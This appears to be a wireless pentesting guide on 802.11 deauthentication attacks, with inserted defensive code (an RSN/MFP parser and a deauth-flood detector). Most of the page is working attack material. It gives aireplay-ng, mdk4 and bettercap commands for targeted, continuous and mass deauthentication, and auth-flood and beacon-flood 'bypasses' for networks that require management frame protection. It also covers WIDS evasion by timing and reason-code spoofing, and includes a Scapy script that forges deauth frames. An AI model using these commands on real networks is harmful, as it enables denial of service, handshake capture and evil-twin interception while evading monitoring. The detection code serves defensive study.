Deauthentication Attacks
Deauthentication frames can disconnect clients from a network. This is used to capture handshakes, force clients to roam to an evil twin, or cause denial of service.
Primary defense: 802.11w (Management Frame Protection). Check for it with airodump-ng (look for the MFPR or MFPC flags in its output).
Deauth Fundamentals
802.11 deauthentication frames are unencrypted management frames (in networks without 802.11w). Any device can spoof a deauth from the AP's BSSID to disconnect clients. Use cases in pentesting:
- Handshake capture: Force WPA 4-way handshake by disconnecting a client
- Evil twin herding: Push clients from real AP to your rogue AP
- Hidden SSID reveal: Force client reassociation to expose SSID in probes
- Denial of service: Continuously deauth all clients from target AP
- PMKID capture: Force AP to re-send PMKID in first EAPOL frame
Aireplay-ng
Deauthenticate a single client.
```bash
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
```
Broadcast deauth to all clients (continuous).
```bash
sudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon
```
MDK4 Advanced Deauth
MDK4 is more powerful than aireplay — it supports various deauth/disassociation modes and can target multiple BSSIDs simultaneously.
```bash
# Target specific AP (mdk4 reads the BSSID list from a file)
echo "AA:BB:CC:DD:EE:FF" > target.txt
sudo mdk4 wlan0mon d -b target.txt
# Restrict to channel 6 (-c is the channel list; mdk4 d mode sends
# both deauthentication AND disassociation frames by default)
sudo mdk4 wlan0mon d -b target.txt -c 6
# Mass deauth all visible networks (DESTRUCTIVE!)
sudo mdk4 wlan0mon d
```
Bettercap
Deauth using Bettercap's integrated WiFi module.
```bash
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.deauth AA:BB:CC:DD:EE:FF
```
802.11w (MFP) Interaction
802.11w (Management Frame Protection / PMF) is the primary defense against deauthentication attacks. Understanding whether MFP is enabled determines which attack techniques will work.
Detecting MFP Status
```bash
# Check MFP status in airodump-ng output
# Look at the columns after AUTH:
# MFPC = Management Frame Protection Capable (optional)
# MFPR = Management Frame Protection Required (mandatory)
sudo airodump-ng wlan0mon
# Detailed check with iw (-E is needed so the | alternation is treated as a regex)
sudo iw dev wlan0mon scan | grep -A 15 "CorpWiFi" | grep -iE "pmf|mfp|capabilities"
# Wireshark filter — check the RSN capabilities field of beacon frames
# In the RSN Capabilities field, bit 6 = MFPR (required) and bit 7 = MFPC (capable)
tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x08" \
  -T fields -e wlan.ssid -e wlan.rsn.capabilities.mfpc -e wlan.rsn.capabilities.mfpr
```
MFP Status Impact on Attacks
| MFP Setting | Deauth Works? | Alternative Attack |
|---|---|---|
| Disabled | Yes — fully effective | Standard deauth with any tool |
| Optional (MFPC) | Depends on client | Works on clients that didn't negotiate MFP |
| Required (MFPR) | No — silently dropped | CSA, beacon flood, TKIP countermeasures, channel DoS |
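The MFP status that the tshark fields above report comes from two bits in the RSN Capabilities field of the RSN information element (element ID 48) carried in beacons and probe responses. The following parser, added here as an example and not part of the original page or any of the tools it mentions, decodes that element directly and maps the MFPC/MFPR bits onto the three rows of the table above. The sample elements are constructed inline for the example; the bit positions (B6 = MFPR, B7 = MFPC) are the standard RSNE definitions.

```python
import struct

RSN_ELEMENT_ID = 0x30      # element ID 48
MFPR_BIT = 1 << 6          # Management Frame Protection Required
MFPC_BIT = 1 << 7          # Management Frame Protection Capable


def parse_rsn_ie(ie: bytes) -> dict:
    """Decode an RSN element (with or without its ID/length header) and report MFP status.

    Layout: version(2) | group cipher(4) | pairwise count(2) | pairwise suites(4*n)
            | AKM count(2) | AKM suites(4*m) | RSN capabilities(2, optional) | ...
    """
    body = ie[2:] if len(ie) >= 2 and ie[0] == RSN_ELEMENT_ID and ie[1] == len(ie) - 2 else ie
    pos = 0

    def take(n: int) -> bytes:
        nonlocal pos
        if pos + n > len(body):
            raise ValueError(f"RSN IE truncated at offset {pos}")
        chunk = body[pos:pos + n]
        pos += n
        return chunk

    version = struct.unpack("<H", take(2))[0]
    if version != 1:
        raise ValueError(f"unsupported RSN version {version}")
    take(4)                                             # group cipher suite (not needed here)
    pairwise_count = struct.unpack("<H", take(2))[0]
    for _ in range(pairwise_count):
        take(4)
    akm_count = struct.unpack("<H", take(2))[0]
    akms = [take(4).hex() for _ in range(akm_count)]

    # The capabilities field is optional; when absent the standard treats it as all zero.
    caps = struct.unpack("<H", take(2))[0] if pos + 2 <= len(body) else 0
    mfpc = bool(caps & MFPC_BIT)
    mfpr = bool(caps & MFPR_BIT)
    if mfpc and mfpr:
        status = "required"     # table row "Required (MFPR)": deauth frames are dropped
    elif mfpc:
        status = "optional"     # table row "Optional (MFPC)": depends on client negotiation
    elif mfpr:
        status = "invalid"      # MFPR without MFPC is not a legal combination
    else:
        status = "disabled"     # table row "Disabled"
    return {"capabilities": caps, "mfpc": mfpc, "mfpr": mfpr, "status": status, "akm": akms}


# Constructed sample elements (hex), not captured from any real network:
# WPA2-PSK (AKM 00-0f-ac-02), CCMP, capabilities 0x0000
RSN_NO_MFP = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
# Same network with MFPC set (capabilities 0x0080)
RSN_MFP_OPTIONAL = bytes.fromhex("30140100000fac040100000fac040100000fac028000")
# WPA3-SAE (AKM 00-0f-ac-08) with MFPC and MFPR set (capabilities 0x00c0)
RSN_MFP_REQUIRED = bytes.fromhex("30140100000fac040100000fac040100000fac08c000")
# Element that ends right after the AKM list (capabilities field absent)
RSN_NO_CAPS = bytes.fromhex("30120100000fac040100000fac040100000fac02")


if __name__ == "__main__":
    for name, ie in [("no MFP", RSN_NO_MFP), ("MFP optional", RSN_MFP_OPTIONAL),
                     ("MFP required", RSN_MFP_REQUIRED), ("no caps field", RSN_NO_CAPS)]:
        print(f"{name:14s} -> {parse_rsn_ie(ie)}")
```

Feeding this the raw element bytes exported by tshark (`-e wlan.rsn.version` and friends give decoded fields, but `-e wlan.tag` or a pcap parser gives the raw element) lets a defender inventory which of their own APs still advertise MFP as disabled or merely optional.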
Bypasses When MFP Is Required
```bash
# Bypass 1: Channel Switch Announcement (CSA) injection
# Spoof CSA beacons from the AP, telling clients to move to a different channel
# Clients obey CSA even with MFP — it's processed before authentication
sudo mdk4 wlan0mon d -b target.txt -c 6 -w 1
# Bypass 2: Rogue AP on same SSID without MFP
# If AP uses MFPC (optional), create a twin without MFP
# Clients that connect to your AP won't have MFP protection
# Then deauth them from your own AP freely
# Bypass 3: Auth flood (exhaust AP association table)
# Flood the AP with fake authentication requests
# When association table is full, legitimate clients can't re-associate
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF
# Bypass 4: Beacon flood to confuse clients
# Create hundreds of fake APs on the same channel
# Overwhelms client network selection
sudo mdk4 wlan0mon b -f ssid-list.txt -c 6
```
Detection Evasion
Enterprise WLANs often deploy Wireless Intrusion Detection Systems (WIDS) that alert on deauthentication floods. These techniques reduce detection probability.
WIDS Detection Thresholds
Low-and-Slow Deauthentication
```bash
# Technique 1: Rate-limited deauth (1 burst every 30 seconds)
# Only need a single deauth to trigger handshake re-capture
for i in $(seq 1 5); do
  sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
  sleep 30
done
# Technique 2: Target only high-value clients
# Instead of broadcast deauth, target specific client MACs
# identified during recon — this generates far fewer frames
sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# Technique 3: Disassociation instead of deauthentication
# Some WIDS don't alert on disassociation (reason code 8)
# aireplay reason codes: -0 = deauth, reason code 7
sudo mdk4 wlan0mon d -b target.txt -s 1   # -s = speed limit in packets per second
```
Reason Code Manipulation
Deauth frames contain a reason code that tells the client why it was disconnected. Some look more legitimate than others. WIDS and analysts examine these.
| Code | Meaning | Stealth Level | Notes |
|---|---|---|---|
| 1 | Unspecified | Low | Obvious attack indicator |
| 3 | STA leaving | High | Looks like normal client disconnect |
| 4 | Inactivity | High | Mimics AP idle timeout |
| 5 | AP busy | Medium | Plausible during congestion |
| 7 | Class 3 from non-assoc | Low | Default aireplay-ng — most flagged |
| 8 | STA leaving BSS | High | Disassociation — less monitored |
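The WIDS behaviour described in the Detection Evasion section (alerting on floods) and the reason-code analysis in the table above can be expressed as a small detector. The code below is an added example and is not part of the original page or of any WIDS product: it runs over decoded deauthentication/disassociation frames (a constructed sample, not real captures) and raises three kinds of alert: a burst from one BSSID inside a short window, a broadcast disconnect, and the low-and-slow pattern of the same client being disconnected repeatedly over a long window, which a burst-only threshold misses. It also counts disassociation frames, which the page notes some WIDS ignore, and summarises reason codes per BSSID. The thresholds and window sizes are assumptions chosen for the example.

```python
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class MgmtFrame:
    ts: float       # capture timestamp in seconds
    bssid: str      # addr3
    src: str        # addr2 (transmitter)
    dst: str        # addr1 (receiver)
    subtype: str    # "deauth" or "disassoc"
    reason: int     # 802.11 reason code


def detect_disconnect_attacks(frames, burst_window=10.0, burst_threshold=5,
                              slow_window=300.0, slow_threshold=3) -> List[Tuple[str, str, str]]:
    """Return (kind, bssid, detail) alerts for burst, broadcast and low-and-slow patterns."""
    alerts: List[Tuple[str, str, str]] = []
    per_bssid: Dict[str, Deque[float]] = defaultdict(deque)          # sliding burst window
    per_client: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)  # long window per client
    burst_seen, slow_seen = set(), set()

    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue                      # disassociation counts just like deauthentication
        bssid = f.bssid.lower()
        # The "client" is whichever address is not the BSSID, regardless of direction
        client = (f.dst if f.src.lower() == bssid else f.src).lower()

        if client == BROADCAST:           # one broadcast disconnect is already suspicious
            alerts.append(("broadcast", bssid, f"{f.subtype} reason={f.reason} at t={f.ts:.1f}s"))

        q = per_bssid[bssid]
        q.append(f.ts)
        while f.ts - q[0] > burst_window:
            q.popleft()
        if len(q) >= burst_threshold and bssid not in burst_seen:
            burst_seen.add(bssid)
            alerts.append(("burst", bssid, f"{len(q)} frames within {burst_window:.0f}s"))

        key = (bssid, client)
        p = per_client[key]
        p.append(f.ts)
        while f.ts - p[0] > slow_window:
            p.popleft()
        # Repeated disconnects of the same client spread out over more than one burst window
        if len(p) >= slow_threshold and p[-1] - p[0] > burst_window and key not in slow_seen:
            slow_seen.add(key)
            alerts.append(("low-and-slow", bssid,
                           f"{client} disconnected {len(p)}x over {p[-1] - p[0]:.0f}s"))
    return alerts


def reason_profile(frames) -> Dict[str, Counter]:
    """Reason-code histogram per BSSID; a spike of code 7 is the aireplay-ng default signature."""
    profile: Dict[str, Counter] = defaultdict(Counter)
    for f in frames:
        if f.subtype in ("deauth", "disassoc"):
            profile[f.bssid.lower()][f.reason] += 1
    return profile


# Constructed sample (not a real capture): addresses and timings are made up for the example
AP_A, AP_B = "aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55"
CLIENT_1, CLIENT_2, CLIENT_3 = "cc:dd:ee:ff:00:11", "66:77:88:99:aa:bb", "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    MgmtFrame(0.0, AP_A, CLIENT_3, AP_A, "deauth", 3),                        # benign: client leaves
    *[MgmtFrame(20.0 + 0.3 * i, AP_A, AP_A, CLIENT_1, "deauth", 7) for i in range(6)],  # burst
    MgmtFrame(40.0, AP_A, AP_A, BROADCAST, "disassoc", 8),                    # broadcast disassoc
    *[MgmtFrame(100.0 + 30.0 * i, AP_B, AP_B, CLIENT_2, "deauth", 4) for i in range(4)],  # low-and-slow
]

if __name__ == "__main__":
    for alert in detect_disconnect_attacks(SAMPLE_FRAMES):
        print(alert)
    for bssid, counts in reason_profile(SAMPLE_FRAMES).items():
        print(bssid, dict(counts))
```

On the sample the single client-initiated reason-3 frame produces nothing, the six-frame burst and the broadcast disassociation each produce one alert, and the 30-second-spaced frames to one client are caught by the per-client rule even though they never exceed the burst threshold.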
```bash
# Scapy — craft deauths with custom reason codes
python3 << 'EOF'
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp
# Reason code 3 = "Deauthenticated because sending STA is leaving"
# Looks like a natural client disconnect from the AP's perspective
ap_mac = "AA:BB:CC:DD:EE:FF"
client_mac = "CC:DD:EE:FF:00:11"
iface = "wlan0mon"
# Craft deauth from AP to client (reason 3)
pkt = RadioTap() / Dot11(
    addr1=client_mac,   # destination
    addr2=ap_mac,       # source (spoofed AP)
    addr3=ap_mac        # BSSID
) / Dot11Deauth(reason=3)
# Send three frames with a fixed 0.5 s inter-packet delay (inter= is constant, not random)
sendp(pkt, iface=iface, count=3, inter=0.5)
EOF
```
Targeted Deauth Strategy
Effective deauthentication requires a tactical approach rather than blind flooding. Match the technique to your objective for best results and lowest detection risk.
| Objective | Technique | Frames Needed | WIDS Risk |
|---|---|---|---|
| WPA handshake capture | Single client, 2–5 frames | 2–5 | Minimal |
| Evil twin herding | Sustained targeted, 10 sec bursts | 50–100 | Medium |
| Hidden SSID reveal | Single client, 1–3 frames | 1–3 | Minimal |
| DoS demonstration | Broadcast, continuous | ∞ | Very High |
| PMKID capture | AP-only (hcxdumptool) | 0 (passive) | None |
Deauthentication Attack Practice
Practice deauth attacks, handshake capture, and MFP testing in isolated lab environments.